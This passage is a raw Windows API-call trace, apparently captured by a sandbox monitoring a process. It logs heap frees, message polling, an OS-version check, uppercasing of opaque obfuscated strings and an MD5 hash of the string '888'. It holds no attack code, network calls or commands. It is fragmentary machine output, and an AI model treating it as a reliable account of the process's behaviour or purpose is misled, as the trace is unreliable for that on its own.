hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71c88 | out: hHeap=0x2af0000) returned 1 [0212.387] CharUpperBuffW (in: lpsz="SSA1A0070620F", cchLength=0xd | out: lpsz="SSA1A0070620F") returned 0xd [0212.387] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a77ad0 | out: hHeap=0x2af0000) returned 1 [0212.387] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71ca8 | out: hHeap=0x2af0000) returned 1 [0212.387] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab188 | out: hHeap=0x2af0000) returned 1 [0212.387] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab320 | out: hHeap=0x2af0000) returned 1 [0212.387] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab140 | out: hHeap=0x2af0000) returned 1 [0212.387] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71ce8 | out: hHeap=0x2af0000) returned 1 [0212.387] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71bb8 | out: hHeap=0x2af0000) returned 1 [0212.387] PeekMessageW (in: lpMsg=0x8cf0a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf0a8) returned 0 [0212.387] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a5e800 | out: hHeap=0x2af0000) returned 1 [0212.387] PeekMessageW (in: lpMsg=0x8cf0a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf0a8) returned 0 [0212.387] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71ce8 | out: hHeap=0x2af0000) returned 1 [0212.387] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab368 | out: hHeap=0x2af0000) returned 1 [0212.387] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab2a8 | out: hHeap=0x2af0000) returned 1 [0212.387] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab308 | out: hHeap=0x2af0000) returned 1 [0212.387] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71be8 | out: hHeap=0x2af0000) returned 1 [0212.387] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71c88 | out: hHeap=0x2af0000) returned 1 [0212.387] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a5dfa8 | out: hHeap=0x2af0000) returned 1 [0212.388] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab428 | out: hHeap=0x2af0000) returned 1 [0212.388] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71d28 | out: hHeap=0x2af0000) returned 1 [0212.388] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab1d0 | out: hHeap=0x2af0000) returned 1 [0212.388] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab3c8 | out: hHeap=0x2af0000) returned 1 [0212.388] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab410 | out: hHeap=0x2af0000) returned 1 [0212.388] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x29f7080 | out: hHeap=0x2af0000) returned 1 [0212.388] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71d18 | out: hHeap=0x2af0000) returned 1 [0212.388] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71aa8 | out: hHeap=0x2af0000) returned 1 [0212.388] PeekMessageW (in: lpMsg=0x8cf4a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf4a8) returned 0 [0212.388] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab410 | out: hHeap=0x2af0000) returned 1 [0212.388] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab2a8 | out: hHeap=0x2af0000) returned 1 [0212.388] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab2c0 | out: hHeap=0x2af0000) returned 1 [0212.388] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71c58 | out: hHeap=0x2af0000) returned 1 [0212.388] LoadLibraryW (lpLibFileName="Advapi32.dll") returned 0x76390000 [0212.388] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab1d0 | out: hHeap=0x2af0000) returned 1 [0212.388] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab2c0 | out: hHeap=0x2af0000) returned 1 [0212.388] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab338 | out: hHeap=0x2af0000) returned 1 [0212.388] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71bc8 | out: hHeap=0x2af0000) returned 1 [0212.388] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab218 | out: hHeap=0x2af0000) returned 1 [0212.388] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71bb8 | out: hHeap=0x2af0000) returned 1 [0212.388] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab290 | out: hHeap=0x2af0000) returned 1 [0212.389] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a77e18 | out: hHeap=0x2af0000) returned 1 [0212.389] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71aa8 | out: hHeap=0x2af0000) returned 1 [0212.389] PeekMessageW (in: lpMsg=0x8cf4a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf4a8) returned 0 [0212.389] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71aa8 | out: hHeap=0x2af0000) returned 1 [0212.389] PeekMessageW (in: lpMsg=0x8cf4a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf4a8) returned 0 [0212.389] CharUpperBuffW (in: lpsz="A4E00B02826", cchLength=0xb | out: lpsz="A4E00B02826") returned 0xb [0212.389] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a77f30 | out: hHeap=0x2af0000) returned 1 [0212.389] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71aa8 | out: hHeap=0x2af0000) returned 1 [0212.389] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71d28 | out: hHeap=0x2af0000) returned 1 [0212.389] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab170 | out: hHeap=0x2af0000) returned 1 [0212.389] PeekMessageW (in: lpMsg=0x8cf248, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf248) returned 0 [0212.389] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71c08 | out: hHeap=0x2af0000) returned 1 [0212.389] CharUpperBuffW (in: lpsz="SSA4E00B02826", cchLength=0xd | out: lpsz="SSA4E00B02826") returned 0xd [0212.389] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a77b70 | out: hHeap=0x2af0000) returned 1 [0212.389] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71d38 | out: hHeap=0x2af0000) returned 1 [0212.389] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab2f0 | out: hHeap=0x2af0000) returned 1 [0212.389] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab308 | out: hHeap=0x2af0000) returned 1 [0212.389] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab338 | out: hHeap=0x2af0000) returned 1 [0212.389] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71be8 | out: hHeap=0x2af0000) returned 1 [0212.389] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71d88 | out: hHeap=0x2af0000) returned 1 [0212.389] PeekMessageW (in: lpMsg=0x8cf248, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf248) returned 0 [0212.389] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a5ea40 | out: hHeap=0x2af0000) returned 1 [0212.389] PeekMessageW (in: lpMsg=0x8cf248, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf248) returned 0 [0212.389] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71c38 | out: hHeap=0x2af0000) returned 1 [0212.389] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab3e0 | out: hHeap=0x2af0000) returned 1 [0212.389] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab3c8 | out: hHeap=0x2af0000) returned 1 [0212.389] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab218 | out: hHeap=0x2af0000) returned 1 [0212.390] PeekMessageW (in: lpMsg=0x8cf248, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf248) returned 0 [0212.390] PeekMessageW (in: lpMsg=0x8cf4a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf4a8) returned 0 [0212.390] PeekMessageW (in: lpMsg=0x8cf4a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf4a8) returned 0 [0212.390] PeekMessageW (in: lpMsg=0x8cf4a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf4a8) returned 0 [0212.390] CharUpperBuffW (in: lpsz="OSVersion", cchLength=0x9 | out: lpsz="OSVERSION") returned 0x9 [0212.390] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="WIN_8", cchCount1=5, lpString2="WIN_2000", cchCount2=8) returned 3 [0212.390] PeekMessageW (in: lpMsg=0x8cf4a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf4a8) returned 0 [0212.390] CharUpperBuffW (in: lpsz="A4F00A00447", cchLength=0xb | out: lpsz="A4F00A00447") returned 0xb [0212.390] PeekMessageW (in: lpMsg=0x8cf048, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf048) returned 0 [0212.390] CharUpperBuffW (in: lpsz="SSA4F00A00447", cchLength=0xd | out: lpsz="SSA4F00A00447") returned 0xd [0212.390] PeekMessageW (in: lpMsg=0x8cf048, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf048) returned 0 [0212.390] PeekMessageW (in: lpMsg=0x8cf048, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf048) returned 0 [0212.390] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0212.390] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptAcquireContext", cchWideChar=20, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 20 [0212.390] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptAcquireContext", cchWideChar=20, lpMultiByteStr=0x29f7160, cbMultiByte=20, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CryptAcquireContext", lpUsedDefaultChar=0x0) returned 20 [0212.390] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptAcquireContextA", cchWideChar=21, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 21 [0212.390] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptAcquireContextA", cchWideChar=21, lpMultiByteStr=0x29f7120, cbMultiByte=21, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CryptAcquireContextA", lpUsedDefaultChar=0x0) returned 21 [0212.391] CryptAcquireContextA (in: phProv=0x8cefd8, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x8cefd8*=0xa7c660) returned 1 [0212.391] PeekMessageW (in: lpMsg=0x8cf4a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf4a8) returned 0 [0212.391] PeekMessageW (in: lpMsg=0x8cf4a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf4a8) returned 0 [0212.391] CharUpperBuffW (in: lpsz="A0600D00A16", cchLength=0xb | out: lpsz="A0600D00A16") returned 0xb [0212.391] PeekMessageW (in: lpMsg=0x8cf248, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf248) returned 0 [0212.391] CharUpperBuffW (in: lpsz="SSA0600D00A16", cchLength=0xd | out: lpsz="SSA0600D00A16") returned 0xd [0212.391] PeekMessageW (in: lpMsg=0x8cf248, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf248) returned 0 [0212.392] PeekMessageW (in: lpMsg=0x8cf248, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf248) returned 0 [0212.392] PeekMessageW (in: lpMsg=0x8cf248, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf248) returned 0 [0212.392] PeekMessageW (in: lpMsg=0x8cf4a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf4a8) returned 0 [0212.392] PeekMessageW (in: lpMsg=0x8cf4a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf4a8) returned 0 [0212.392] PeekMessageW (in: lpMsg=0x8cf4a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf4a8) returned 0 [0212.392] CharUpperBuffW (in: lpsz="A5C00800A45", cchLength=0xb | out: lpsz="A5C00800A45") returned 0xb [0212.392] PeekMessageW (in: lpMsg=0x8cf248, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf248) returned 0 [0212.392] CharUpperBuffW (in: lpsz="SSA5C00800A45", cchLength=0xd | out: lpsz="SSA5C00800A45") returned 0xd [0212.392] PeekMessageW (in: lpMsg=0x8cf248, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf248) returned 0 [0212.392] PeekMessageW (in: lpMsg=0x8cf248, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf248) returned 0 [0212.392] PeekMessageW (in: lpMsg=0x8cf248, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf248) returned 0 [0212.392] PeekMessageW (in: lpMsg=0x8cf4a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf4a8) returned 0 [0212.392] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0212.392] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0212.392] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0212.392] CharUpperBuffW (in: lpsz="A2E00304E40", cchLength=0xb | out: lpsz="A2E00304E40") returned 0xb [0212.392] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0212.392] CharUpperBuffW (in: lpsz="SSA2E00304E40", cchLength=0xd | out: lpsz="SSA2E00304E40") returned 0xd [0212.392] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0212.392] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0212.392] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0212.392] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0212.392] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0212.393] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0212.393] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0212.393] CharUpperBuffW (in: lpsz="A1100103809", cchLength=0xb | out: lpsz="A1100103809") returned 0xb [0212.393] PeekMessageW (in: lpMsg=0x8cf158, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf158) returned 0 [0212.393] CharUpperBuffW (in: lpsz="SSA1100103809", cchLength=0xd | out: lpsz="SSA1100103809") returned 0xd [0212.393] PeekMessageW (in: lpMsg=0x8cf158, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf158) returned 0 [0212.393] PeekMessageW (in: lpMsg=0x8cf158, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf158) returned 0 [0212.393] CharUpperBuffW (in: lpsz="A1A0070620F", cchLength=0xb | out: lpsz="A1A0070620F") returned 0xb [0212.393] PeekMessageW (in: lpMsg=0x8ced58, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8ced58) returned 0 [0212.393] CharUpperBuffW (in: lpsz="SSA1A0070620F", cchLength=0xd | out: lpsz="SSA1A0070620F") returned 0xd [0212.393] PeekMessageW (in: lpMsg=0x8ced58, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8ced58) returned 0 [0212.393] PeekMessageW (in: lpMsg=0x8ced58, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8ced58) returned 0 [0212.393] PeekMessageW (in: lpMsg=0x8cf158, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf158) returned 0 [0212.393] PeekMessageW (in: lpMsg=0x8cf158, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf158) returned 0 [0212.394] CharUpperBuffW (in: lpsz="A5C00800A45", cchLength=0xb | out: lpsz="A5C00800A45") returned 0xb [0212.394] PeekMessageW (in: lpMsg=0x8ceef8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8ceef8) returned 0 [0212.394] CharUpperBuffW (in: lpsz="SSA5C00800A45", cchLength=0xd | out: lpsz="SSA5C00800A45") returned 0xd [0212.394] PeekMessageW (in: lpMsg=0x8ceef8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8ceef8) returned 0 [0212.394] PeekMessageW (in: lpMsg=0x8ceef8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8ceef8) returned 0 [0212.394] PeekMessageW (in: lpMsg=0x8ceef8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8ceef8) returned 0 [0212.394] PeekMessageW (in: lpMsg=0x8cf158, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf158) returned 0 [0212.394] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0212.394] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0212.394] CharUpperBuffW (in: lpsz="A4F00A00447", cchLength=0xb | out: lpsz="A4F00A00447") returned 0xb [0212.394] PeekMessageW (in: lpMsg=0x8cef58, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cef58) returned 0 [0212.394] CharUpperBuffW (in: lpsz="SSA4F00A00447", cchLength=0xd | out: lpsz="SSA4F00A00447") returned 0xd [0212.394] PeekMessageW (in: lpMsg=0x8cef58, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cef58) returned 0 [0212.394] PeekMessageW (in: lpMsg=0x8cef58, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cef58) returned 0 [0212.394] CharUpperBuffW (in: lpsz="A2300C04232", cchLength=0xb | out: lpsz="A2300C04232") returned 0xb [0212.394] PeekMessageW (in: lpMsg=0x8cef58, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cef58) returned 0 [0212.394] CharUpperBuffW (in: lpsz="SSA2300C04232", cchLength=0xd | out: lpsz="SSA2300C04232") returned 0xd [0212.394] PeekMessageW (in: lpMsg=0x8cef58, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cef58) returned 0 [0212.394] PeekMessageW (in: lpMsg=0x8cef58, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cef58) returned 0 [0212.394] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0212.394] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptCreateHash", cchWideChar=16, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 16 [0212.394] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptCreateHash", cchWideChar=16, lpMultiByteStr=0x2aab458, cbMultiByte=16, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CryptCreateHash", lpUsedDefaultChar=0x0) returned 16 [0212.395] CryptCreateHash (in: hProv=0xa7c660, Algid=0x8003, hKey=0x0, dwFlags=0x0, phHash=0x8cef48 | out: phHash=0x8cef48) returned 1 [0212.395] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0212.395] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0212.395] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0212.395] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0212.395] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="888", cchWideChar=4, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 4 [0212.395] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="888", cchWideChar=4, lpMultiByteStr=0x2a71d48, cbMultiByte=4, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="888", lpUsedDefaultChar=0x0) returned 4 [0212.395] CharLowerBuffW (in: lpsz="byte[3]", cchLength=0x7 | out: lpsz="byte[3]") returned 0x7 [0212.395] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0212.395] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="888", cchWideChar=4, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 4 [0212.395] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="888", cchWideChar=4, lpMultiByteStr=0x2a71ce8, cbMultiByte=4, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="888", lpUsedDefaultChar=0x0) returned 4 [0212.395] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0212.395] CharUpperBuffW (in: lpsz="A4F00A00447", cchLength=0xb | out: lpsz="A4F00A00447") returned 0xb [0212.395] PeekMessageW (in: lpMsg=0x8cef58, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cef58) returned 0 [0212.395] CharUpperBuffW (in: lpsz="SSA4F00A00447", cchLength=0xd | out: lpsz="SSA4F00A00447") returned 0xd [0212.395] PeekMessageW (in: lpMsg=0x8cef58, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cef58) returned 0 [0212.395] PeekMessageW (in: lpMsg=0x8cef58, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cef58) returned 0 [0212.395] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0212.395] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptHashData", cchWideChar=14, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 14 [0212.395] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptHashData", cchWideChar=14, lpMultiByteStr=0x2aab650, cbMultiByte=14, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CryptHashData", lpUsedDefaultChar=0x0) returned 14 [0212.395] CryptHashData (hHash=0x9e2138, pbData=0x2a71d98, dwDataLen=0x3, dwFlags=0x1) returned 1 [0212.395] 